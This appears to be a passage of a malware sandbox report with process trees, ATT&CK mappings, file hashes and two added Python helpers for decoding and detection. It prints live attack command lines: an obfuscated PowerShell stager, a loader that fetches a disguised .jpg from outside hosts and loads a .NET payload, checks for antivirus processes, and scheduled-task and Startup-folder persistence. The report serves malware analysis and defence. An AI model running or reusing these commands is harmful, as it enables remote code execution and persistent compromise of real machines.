@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@Gg@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@Gg@bwBk@Cg@JwBs@GY@cwBn@GU@Z@Bk@GQ@Z@Bk@GQ@Z@Bh@Cc@KQ@u@Ek@bgB2@G8@awBl@Cg@J@Bu@HU@b@Bs@Cw@I@Bb@G8@YgBq@GU@YwB0@Fs@XQBd@C@@K@@n@C@@d@B4@HQ@LgBk@GU@QQBt@Go@ZwBu@C8@cwBl@Gw@aQBm@F8@YwBp@Gw@YgB1@H@@Lw@y@DE@MQ@u@DY@Mg@y@C4@M@@2@C4@Mg@2@C8@Lw@6@Cc@L@@g@Cc@M@@n@Cw@I@@n@FM@d@Bh@HI@d@B1@H@@TgBh@G0@ZQ@n@Cw@I@@n@E0@cwBi@HU@aQBs@GQ@Jw@s@C@@Jw@w@Cc@KQ@p@H0@fQ@=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken

[depth 11] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4020)
  cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfhgdf/hfgjew/downloads/test2.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.deAmjgn/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
[depth 7] C:\Users\Admin\AppData\Local\Temp\10148470101\ReK7Ewx.exe (PID 1800)
  cmdline: "C:\Users\Admin\AppData\Local\Temp\10148470101\ReK7Ewx.exe"
  - Executes dropped EXE
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery

[depth 8] C:\Windows\SysWOW64\cmd.exe (PID 3300)
  cmdline: "C:\Windows\system32\cmd.exe" /c expand Ae.msi Ae.msi.bat & Ae.msi.bat
  - System Location Discovery: System Language Discovery

[depth 9] C:\Windows\SysWOW64\expand.exe (PID 4084)
  cmdline: expand Ae.msi Ae.msi.bat
  - System Location Discovery: System Language Discovery

[depth 9] C:\Windows\SysWOW64\tasklist.exe (PID 3336)
  cmdline: tasklist
  - Enumerates processes with tasklist

[depth 9] C:\Windows\SysWOW64\findstr.exe (PID 3340)
  cmdline: findstr /I "opssvc wrsa"

[depth 9] C:\Windows\SysWOW64\tasklist.exe (PID 1944)
  cmdline: tasklist
  - Enumerates processes with tasklist

[depth 9] C:\Windows\SysWOW64\findstr.exe (PID 2144)
  cmdline: findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"

[depth 9] C:\Windows\SysWOW64\cmd.exe (PID 3560)
  cmdline: cmd /c md 789919

[depth 9] C:\Windows\SysWOW64\extrac32.exe (PID 3400)
  cmdline: extrac32 /Y /E Deviation.msi

[depth 9] C:\Windows\SysWOW64\cmd.exe (PID 3624)
  cmdline: cmd /c copy /b 789919\Occupation.com + Kate + Invisible + Tells + Gross + Amend + Foul + Snowboard + Digital + Fraud 789919\Occupation.com

[depth 9] C:\Windows\SysWOW64\cmd.exe (PID 2824)
  cmdline: cmd /c copy /b ..\Drug.msi + ..\Contributors.msi + ..\Anthropology.msi + ..\Activities.msi + ..\Opens.msi + ..\Having.msi + ..\Dimension.msi + ..\Responding.msi + ..\Series.msi + ..\Salem.msi q

[depth 9] C:\Users\Admin\AppData\Local\Temp\789919\Occupation.com (PID 2884)
  cmdline: Occupation.com q

[depth 9] C:\Windows\SysWOW64\choice.exe (PID 3620)
  cmdline: choice /d y /t 5

[depth 7] C:\Users\Admin\AppData\Local\Temp\10148480101\yUI6F6C.exe (PID 3460)
  cmdline: "C:\Users\Admin\AppData\Local\Temp\10148480101\yUI6F6C.exe"

[depth 8] C:\Windows\SysWOW64\WerFault.exe (PID 3764)
  cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3460 -s 1204
  - Program crash

[depth 7] C:\Users\Admin\AppData\Local\Temp\10148490101\ADFoyxP.exe (PID 3800)
  cmdline: "C:\Users\Admin\AppData\Local\Temp\10148490101\ADFoyxP.exe"

[depth 8] C:\Windows\SysWOW64\cmd.exe (PID 3916)
  cmdline: "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat

[depth 9] C:\Windows\SysWOW64\expand.exe (PID 3912)
  cmdline: expand Go.pub Go.pub.bat

[depth 9] C:\Windows\SysWOW64\tasklist.exe (PID 4072)
  cmdline: tasklist
  - Enumerates processes with tasklist

[depth 9] C:\Windows\SysWOW64\findstr.exe (PID 4092)
  cmdline: findstr /I "opssvc wrsa"

[depth 9] C:\Windows\SysWOW64\tasklist.exe (PID 2688)
  cmdline: tasklist
  - Enumerates processes with tasklist

[depth 9] C:\Windows\SysWOW64\findstr.exe (PID 2640)
  cmdline: findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"

[depth 9] C:\Windows\SysWOW64\cmd.exe (PID 3216)
  cmdline: cmd /c md 353090

[depth 9] C:\Windows\SysWOW64\extrac32.exe (PID 3008)
  cmdline: extrac32 /Y /E Really.pub

[depth 9] C:\Windows\SysWOW64\findstr.exe (PID 3504)
  cmdline: findstr /V "posted" Good

[depth 9] C:\Windows\SysWOW64\cmd.exe (PID 1952)
  cmdline: cmd /c copy /b 353090\Seat.com + Pf + Somewhere + Volumes + Commission + Lane + Hit + Strong + Copied + Wearing + Acquire 353090\Seat.com

[depth 9] C:\Windows\SysWOW64\cmd.exe (PID 1616)
  cmdline: cmd /c copy /b ..\Maintains.pub + ..\Legislation.pub + ..\Blood.pub + ..\Document.pub + ..\Breaks.pub + ..\Both.pub + ..\Explicitly.pub + ..\Governor.pub + ..\Bull.pub + ..\Comparison.pub + ..\Performing.pub + ..\Gate.pub + ..\Republican.pub + ..\Reverse.pub + ..\Thousand.pub + ..\Apartments.pub + ..\Swingers.pub + ..\Urban.pub + ..\Robert.pub + ..\Regulation.pub + ..\Confusion.pub + ..\Listening.pub + ..\Generating.pub + ..\Argentina.pub + ..\Amenities.pub + ..\Vacation.pub + ..\Vampire.pub + ..\Trademarks.pub + ..\Distinguished.pub + ..\Silly.pub + ..\Hell.pub + ..\Worcester.pub + ..\Concept.pub + ..\Enlarge.pub + ..\Preference.pub + ..\Poem.pub m

[depth 9] C:\Users\Admin\AppData\Local\Temp\353090\Seat.com (PID 2948)
  cmdline: Seat.com m

[depth 10] C:\Users\Admin\AppData\Local\Temp\353090\RegAsm.exe (PID 3508)
  cmdline: C:\Users\Admin\AppData\Local\Temp\353090\RegAsm.exe

[depth 9] C:\Windows\SysWOW64\choice.exe (PID 3588)
  cmdline: choice /d y /t 5

[depth 7] C:\Users\Admin\AppData\Local\Temp\10148500101\CgmaT61.exe (PID 2880)
  cmdline: "C:\Users\Admin\AppData\Local\Temp\10148500101\CgmaT61.exe"

[depth 8] C:\Windows\SysWOW64\WerFault.exe (PID 2524)
  cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2880 -s 1204
  - Program crash

[depth 7] C:\Users\Admin\AppData\Local\Temp\10148510101\PfOHmro.exe (PID 3812)
  cmdline: "C:\Users\Admin\AppData\Local\Temp\10148510101\PfOHmro.exe"

[depth 8] C:\Users\Admin\AppData\Local\Temp\10148510101\PfOHmro.exe (PID 3864)
  cmdline: "C:\Users\Admin\AppData\Local\Temp\10148510101\PfOHmro.exe"

[depth 8] C:\Windows\SysWOW64\WerFault.exe (PID 3964)
  cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3812 -s 500
  - Program crash

[depth 7] C:\Users\Admin\AppData\Local\Temp\10148520101\v6Oqdnc.exe (PID 3280)
  cmdline: "C:\Users\Admin\AppData\Local\Temp\10148520101\v6Oqdnc.exe"

[depth 7] C:\Users\Admin\AppData\Local\Temp\10148530101\mIrI3a9.exe (PID 1616)
  cmdline: "C:\Users\Admin\AppData\Local\Temp\10148530101\mIrI3a9.exe"
[depth 2] C:\Windows\SysWOW64\cmd.exe (PID 1856)
  cmdline: cmd /c schtasks.exe /create /tn "Consider" /tr "wscript //B 'C:\Users\Admin\AppData\Local\EduGenius Studios Co\EduGeniusX.js'" /sc minute /mo 5 /F
  - System Location Discovery: System Language Discovery

[depth 3] C:\Windows\SysWOW64\schtasks.exe (PID 2872)
  cmdline: schtasks.exe /create /tn "Consider" /tr "wscript //B 'C:\Users\Admin\AppData\Local\EduGenius Studios Co\EduGeniusX.js'" /sc minute /mo 5 /F
  - System Location Discovery: System Language Discovery
  - Scheduled Task/Job: Scheduled Task

[depth 2] C:\Windows\SysWOW64\cmd.exe (PID 2860)
  cmdline: cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url" & echo URL="C:\Users\Admin\AppData\Local\EduGenius Studios Co\EduGeniusX.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url" & exit
  - Drops startup file
  - System Location Discovery: System Language Discovery

[depth 2] C:\Windows\SysWOW64\cmd.exe (PID 3628)
  cmdline: cmd /c schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\Admin\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F

[depth 3] C:\Windows\SysWOW64\schtasks.exe (PID 3624)
  cmdline: schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\Admin\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F
  - Scheduled Task/Job: Scheduled Task

[depth 2] C:\Windows\SysWOW64\cmd.exe (PID 3580)
  cmdline: cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & echo URL="C:\Users\Admin\AppData\Local\TradeSecure Innovations\TradeHub.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & exit
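The m4mrV1B.exe branch (depth 8 to 11, PIDs 1680, 3840, 3868 and 4020) is a two-layer PowerShell loader: the first powershell.exe receives a base64 blob in which every 'A' has been swapped for '@', undoes the swap with .replace('@','A'), decodes it as UTF-16LE and hands the result to a second powershell.exe; that second script downloads a ".jpg" from one of two hosts, cuts out whatever sits between the <<BASE64_START>> and <<BASE64_END>> markers, loads those bytes as a .NET assembly with Assembly.Load and invokes a method whose first argument is a URL fragment written backwards. The sandbox already shows the decoded second layer at depth 11; the helper below is an added example (not code from the report or from the sample) that reproduces each of those steps offline so the same chain can be triaged from a captured command line alone. All inputs are constructed for the demo except BACKWARDS_ARG, which is the literal string from the depth-11 command line.

```python
"""
Added triage helper, not part of the tria.ge report or of the sample: reverses
the two obfuscation layers in the m4mrV1B.exe -> cmd -> WScript -> powershell
chain.

Layer 1 (PID 3868): stage-2 script is UTF-16LE, base64-encoded, every 'A' in
  the base64 text replaced by '@'; the stager does .replace('@','A') and
  decodes with [Text.Encoding]::Unicode.
Layer 2 (PID 4020): the decoded script fetches a ".jpg" whose text carries a
  .NET assembly as base64 between <<BASE64_START>> and <<BASE64_END>>, loads
  it with Assembly.Load and invokes a method whose first argument is stored
  backwards.

Every input below is constructed for the demo except BACKWARDS_ARG (literal
from the report).
"""
import base64
import re
from typing import Optional

START_FLAG = "<<BASE64_START>>"
END_FLAG = "<<BASE64_END>>"
BACKWARDS_ARG = " txt.deAmjgn/selif_cilbup/211.622.06.26//:"


def obfuscate_stage1(script: str) -> str:
    """Produce the '@'-substituted base64 form (used only to build test input)."""
    b64 = base64.b64encode(script.encode("utf-16le")).decode("ascii")
    return b64.replace("A", "@")


def decode_stage1(blob: str) -> str:
    """Undo layer 1: '@' -> 'A', base64-decode, UTF-16LE-decode."""
    raw = base64.b64decode(blob.replace("@", "A"), validate=True)
    return raw.decode("utf-16le")


def extract_urls(script: str) -> list:
    """Pull the download URLs out of a decoded stage-1 script ($links = @(...))."""
    return re.findall(r"https?://[^'\"\s)]+", script)


def extract_payload(text: str) -> Optional[bytes]:
    """Undo layer 2: bytes between the flags, or None if the markers are absent
    or out of order (same IndexOf/Substring logic as the decoded script)."""
    start = text.find(START_FLAG)
    end = text.find(END_FLAG)
    if start < 0 or end <= start:
        return None
    b64 = text[start + len(START_FLAG):end].strip()
    return base64.b64decode(b64, validate=True)


def unreverse(arg: str) -> str:
    """The invoked method's first argument is stored backwards; flip it."""
    return arg[::-1].strip()


# --- constructed samples ---------------------------------------------------
SAMPLE_SCRIPT = (
    "$links = @('https://example.invalid/a/test2.jpg?1', "
    "'https://example.invalid/b/test.jpg'); "
    "$imageBytes = DownloadDataFromLinks $links"
)
SAMPLE_BLOB = obfuscate_stage1(SAMPLE_SCRIPT)        # what layer 1 looks like
FAKE_ASSEMBLY = b"MZ\x90\x00not-a-real-assembly"     # stands in for the DLL
SAMPLE_IMAGE = (
    "\xff\xd8\xff\xe0 JFIF padding " + START_FLAG
    + base64.b64encode(FAKE_ASSEMBLY).decode("ascii")
    + END_FLAG + " trailing bytes"
)


def triage() -> dict:
    """Run all steps on the samples and return the recovered artefacts."""
    script = decode_stage1(SAMPLE_BLOB)
    payload = extract_payload(SAMPLE_IMAGE)
    return {
        "script": script,
        "urls": extract_urls(script),
        "payload": payload,
        "payload_is_pe": (payload or b"")[:2] == b"MZ",   # MZ header check
        "target": unreverse(BACKWARDS_ARG),
    }


if __name__ == "__main__":
    for key, value in triage().items():
        print(f"{key}: {value!r}")
```

unreverse(BACKWARDS_ARG) yields "://62.60.226.112/public_files/ngjmAed.txt"; the scheme is not in the string, so whatever prepends it lives in the loaded assembly, which the report does not show. The UTF-16LE step matters for the '@' trick: every other byte of a UTF-16LE ASCII script is 0x00, which base64 renders as 'A' very often, so the substitution hides the usual "JAB..."/"WwB..." prefixes that string scanners key on.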
Network
MITRE ATT&CK Enterprise v15 (numbers are the hit counts shown on the report)
Execution
- Command and Scripting Interpreter (1): PowerShell (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Persistence
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (4): Windows Service (4)
- Scheduled Task/Job (1): Scheduled Task (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (4): Windows Service (4)
- Scheduled Task/Job (1): Scheduled Task (1)
Defense Evasion
- Impair Defenses (5): Disable or Modify Tools (5)
- Indicator Removal (1): File Deletion (1)
- Modify Registry (8)
- Subvert Trust Controls (1): Install Root Certificate (1)
- Virtualization/Sandbox Evasion (2)
Credential Access
- Credentials from Password Stores (1): Credentials from Web Browsers (1)
- Unsecured Credentials (2): Credentials In Files (2)
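The Persistence rows above (Scheduled Task, Registry Run Keys / Startup Folder) correspond to the depth-2/3 commands at the end of the process tree: schtasks /create with a /tr action of wscript //B running a .js from under AppData every 5 minutes, and an [InternetShortcut] .url written into the Startup folder whose URL= is that same local .js. The helper below is an added example, not part of the report, showing how to flag both patterns from raw command lines and file contents as EDR telemetry or a forensic script would see them. The two schtasks lines are copied from the report; the .url text is reconstructed from the echo commands that wrote it; the benign task and benign shortcut are constructed controls; the 15-minute threshold is an assumption.

```python
"""
Added detection helper, not part of the tria.ge report: flags the two
persistence mechanisms the tree shows at depth 2/3. Inputs: raw command lines
and .url file text. The schtasks lines are copied from the report; the .url
text is reconstructed from the echo commands; the benign items are constructed.
"""
import re

SCRIPT_HOSTS = {"wscript", "cscript", "mshta", "powershell", "pwsh", "rundll32", "regsvr32"}
SCRIPT_EXT = re.compile(r"\.(js|jse|vbs|vbe|wsf|hta|ps1|bat|cmd)\b", re.I)
USER_WRITABLE = re.compile(
    r"\\(AppData|ProgramData|Temp|Users\\[^\\]+\\(Downloads|Desktop|Documents))\\", re.I)
MAX_MINUTES = 15   # assumption: a script action re-run this often is worth a look


def parse_schtasks(cmd: str) -> dict:
    """Collect /tn /tr /sc /mo /ru values; a quoted value may contain spaces."""
    opts = {}
    for m in re.finditer(r'/(tn|tr|sc|mo|ru)\s+(?:"([^"]*)"|(\S+))', cmd, re.I):
        opts[m.group(1).lower()] = m.group(2) if m.group(2) is not None else m.group(3)
    return opts


def action_host(tr: str) -> str:
    """First executable name in a /tr action, without directory or .exe."""
    m = re.match(r'\s*"?(?:[^"\s]*\\)?([A-Za-z0-9_]+)(?:\.exe)?', tr)
    return m.group(1).lower() if m else ""


def flag_schtasks_cmdline(cmd: str) -> list:
    """Reasons a schtasks /create line looks like script persistence ([] = clean)."""
    if not re.search(r"schtasks(?:\.exe)?\s+/create\b", cmd, re.I):
        return []
    o = parse_schtasks(cmd)
    tr = o.get("tr", "")
    reasons = []
    host = action_host(tr)
    if host in SCRIPT_HOSTS:
        reasons.append(f"action runs script host {host}")
    if SCRIPT_EXT.search(tr) and USER_WRITABLE.search(tr):
        reasons.append("script lives under a user-writable path")
    if (o.get("sc", "").lower() == "minute" and o.get("mo", "").isdigit()
            and int(o["mo"]) <= MAX_MINUTES):
        reasons.append(f"re-runs every {o['mo']} minute(s)")
    if re.search(r"\s//?B\b", tr, re.I):
        reasons.append("//B suppresses script errors and prompts")
    return reasons


def flag_startup_url(text: str) -> list:
    """Parse an INI-style [InternetShortcut] file; flag a URL= that is a local script."""
    if not re.search(r"^\s*\[InternetShortcut\]", text, re.I | re.M):
        return []
    m = re.search(r'^\s*URL\s*=\s*"?([^"\r\n]+?)"?\s*$', text, re.I | re.M)
    if not m:
        return []
    target = m.group(1)
    if not (re.match(r"[A-Za-z]:\\", target) or target.lower().startswith("file:")):
        return []
    reasons = ["URL= is a local file, not a web address"]
    if SCRIPT_EXT.search(target):
        reasons.append("target is a script, run via its file association at logon")
    if USER_WRITABLE.search(target):
        reasons.append("target lives under a user-writable path")
    return reasons


# --- inputs: two lines from the report, the rest constructed ------------------
SCHTASKS_FROM_REPORT = [
    r'''cmd /c schtasks.exe /create /tn "Consider" /tr "wscript //B 'C:\Users\Admin\AppData\Local\EduGenius Studios Co\EduGeniusX.js'" /sc minute /mo 5 /F''',
    r'''cmd /c schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\Admin\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F''',
]
BENIGN_SCHTASKS = r'''schtasks /create /tn "NightlyBackup" /tr "C:\Program Files\Backup\backup.exe" /sc daily /st 02:00'''
URL_RECONSTRUCTED = ('[InternetShortcut] \r\n'
                     'URL="C:\\Users\\Admin\\AppData\\Local\\EduGenius Studios Co\\EduGeniusX.js" \r\n')
URL_BENIGN = "[InternetShortcut]\r\nURL=https://intranet.example.invalid/\r\n"


def triage(cmdlines, url_files) -> list:
    """Return (label, reasons) for every input that raised at least one reason."""
    hits = []
    for c in cmdlines:
        r = flag_schtasks_cmdline(c)
        if r:
            hits.append((parse_schtasks(c).get("tn", "?"), r))
    for name, text in url_files.items():
        r = flag_startup_url(text)
        if r:
            hits.append((name, r))
    return hits


if __name__ == "__main__":
    for label, reasons in triage(SCHTASKS_FROM_REPORT + [BENIGN_SCHTASKS],
                                 {"EduGeniusX.url": URL_RECONSTRUCTED, "intranet.url": URL_BENIGN}):
        print(label, "->", "; ".join(reasons))
```

Both mechanisms point at the same .js, so a task deletion alone leaves the Startup shortcut to re-launch it at the next logon; a response playbook should remove the task, the .url and the script directory together.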
Downloads
-
Filesize
914B
MD5e4a68ac854ac5242460afd72481b2a44
SHA1df3c24f9bfd666761b268073fe06d1cc8d4f82a4
SHA256cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f
SHA5125622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5
-
Filesize
71KB
MD583142242e97b8953c386f988aa694e4a
SHA1833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10
-
Filesize
1KB
MD5a266bb7dcc38a562631361bbf61dd11b
SHA13b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA5120da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC
Filesize252B
MD5f86126185d63195db3928bc979d65700
SHA10248a2a85b023892daa4db672ca9a27c6178a0f7
SHA2568aafd82e2cacfca9cd9f544f86b414844b617fd2b539712c1cd08f9a7ed65ac0
SHA512391ce43224f24ea3b4daafb2f67faa764e1e7ced657aea8b84b6ff6aebc464c7a93606263fc05fc27f712c813dc827158f3c293d5ff0cb20601dc8bf626c0f9b
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5ed42f3b296450945374d23ac87ab303e
SHA1bfc48184723c33c7defd40b30a0ee81ce850e0e9
SHA256a46bf9d306536e9030cb5eaea344bba492278360d766c0c124487bb7df5a5311
SHA5121c54388b647b1c92d6cf04bea90297f1121f0c249622f58327d392e756d3e228e2803bef08810c842bcbb424e4118924b79f02b586ed60348fc22c4a5ad3d0c7
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD511fe9d8eaaf452348e84f6f500a0c3e4
SHA13445aaae87ff79391300d896639c6cde0bfc76ef
SHA2566e906359cb8bf878a619031ae9e74e1890ef2639e80c171a18af3b645ed903db
SHA51292ba1003a925612cead654e713ef7ca1d3c36c8445cc1f6ffa1efb910efc2bcbb9517084f4a683123cde313b89685e97743585a372717603f8d8cf811facdaed
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5ad2b9d7fa0047c74e01fb203c9dea418
SHA1cba0a1691acd99eb4ef176acc734f1eaa6a78c1e
SHA2561dee3481a0a3a4d1d06bdc30b4f17b58151edc0fff201f5b84967f45c958d6ec
SHA5125ad84e751929371eaed117331fa2c60eca6526ff09707e8e3f9ef9624e4f0d29d03ef41962db0acf87a607df26cb8c1ec453ad68e0840aaaa7827d34259ee59e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD59600b4a76c41919d750d714080795315
SHA14d1949b6ee7ed191fbfba354e3c0422dd022d7e8
SHA25664bebb4e8b7e58eb01b372269982652dccc7c53a1bf7f2f5828916262c8b95f2
SHA51210c1d33c693a2dc8876be553991f7fb1b369b5a3ff0b8b204cd6a52c025a0f4a26053d14ab4334b4cd9f47e7015bab7b72efbc133e9073137ec92023a8a7745d
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5baff864b340fa88b3051a584bbfbb75d
SHA1734356b2b32582cdf5c9dbcb5751a5227649a5ae
SHA2564f0e4d267fb0fc9c5340bfcb67fb4deea9f8dbd5b577351779248f7d2eb0e070
SHA512ff4e1e0ab6b0e6b42131d1aecefe0d8ef8e354c5bb1ea34c49e72ae112c74e7ab1161f3e9d9632c23fd938f2629e3150d6df73cffc1068bfbd698bdc7425b877
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD52deb1013e896f5aa2086063eedcf68d7
SHA1b11a84da3361ef58fdae7e3737f9b3a8d22b508e
SHA256183b98f749789d9d4792e5b4a7c91c83ddda6c8ac826f1d09d5118442a02dcc9
SHA51265d85409da45fd30efcfb6e3899f86630c58373c9308dbd449940b71778118c1ba396de5d1c68b03e4e35038b141dad523d8f8e2365b2c56ea9057708e02ffd7
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5dd39ef474a3f4edd9d3a8e52bce19ded
SHA17d3f845d0b565d46acbd2cd9f66ca0ead8b5a565
SHA256969895c4f4c4d1ead55dc760b812018e8dc612121d177ecbe735e4465f0bf98f
SHA512c23a33f56b594b1f134012bee5bf14ab374295f1911a2570772b180afbc7cb7317adc5abab98cb1ca6b0b680a072ae3842c9b95f5bb4d15de2c8308c12a846a8
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD51734e44d0577ba57749b922b39f1f60c
SHA12bb3d603c6667e5bd80ed3deadfa9e35d39be545
SHA256af749ecf41a3340a8bc9b65d95cb5995ba94bda75a135f2e80507cefc48f8a46
SHA51237e6e1b58ae3ba047eb0892d4172fdf20a02dbdd653643aafde72ab8d040b6cc22e967073c9fbba709fd1b46acf817ad81a95401d7ebe867fbec03fd1c0841e7
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5c6e40afb9c8dbf85c3b04b3dd445a5ea
SHA1dd38d5ad2a33a05c63cc7cd4650ce8263b4ff6b8
SHA256d8775fc071e35d00f66268968889f9dcb3be095e41438a4cdd40e61f91242e7d
SHA512f0dcb29f341778a0aac41fd562949309bd59c07e9a81846d1e23bd62fc2ec4c0ba4ba73a1438a51deae76990e0508387c5461d91079bf32e329cc7e9b00674ae
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5458198ec67e1c09e6bfc75341cd939e4
SHA1569d3102bbcac76dc7588c14840b0546e5e5be2c
SHA256232ed748d9f0f28dc9dd255467fb7188e53760a7ca19155850a49b2e4c6bfac7
SHA512a09727f7436ccd9dd5ea9399b6c0498273c8eeab396c246ed875a90d55dc727003deb8b5533cd20542ac49ef4fb5819a8554494da4a7eb918184c96d795679a6
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5c0f6570ecbcb9df187394b02dfc0de9c
SHA198d1df288e4e2a39d7013d99a79184b00cfb6b1f
SHA25667328b32f12ba2bff9fad804aa3e26f3837d8a134dbd98e99c2ae171629c7bc6
SHA5128489312bb7096b7fcba4d134e74b66daa6baeb8a3332a37343da2f64c9ffcdf9bdb9b54b301d0388ebff93a117380d328c99bc83ece41bc4e8da8fb728f3e5f5
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5c5a7fbf86abc8b3c151da40c343006cf
SHA1026e0608b6bd18bed709a2fe479c59ee4f5266be
SHA25665223da2d0d64efc30b0c6d5c3f24f43ca36c8bccda1bac7599682245bd1aad9
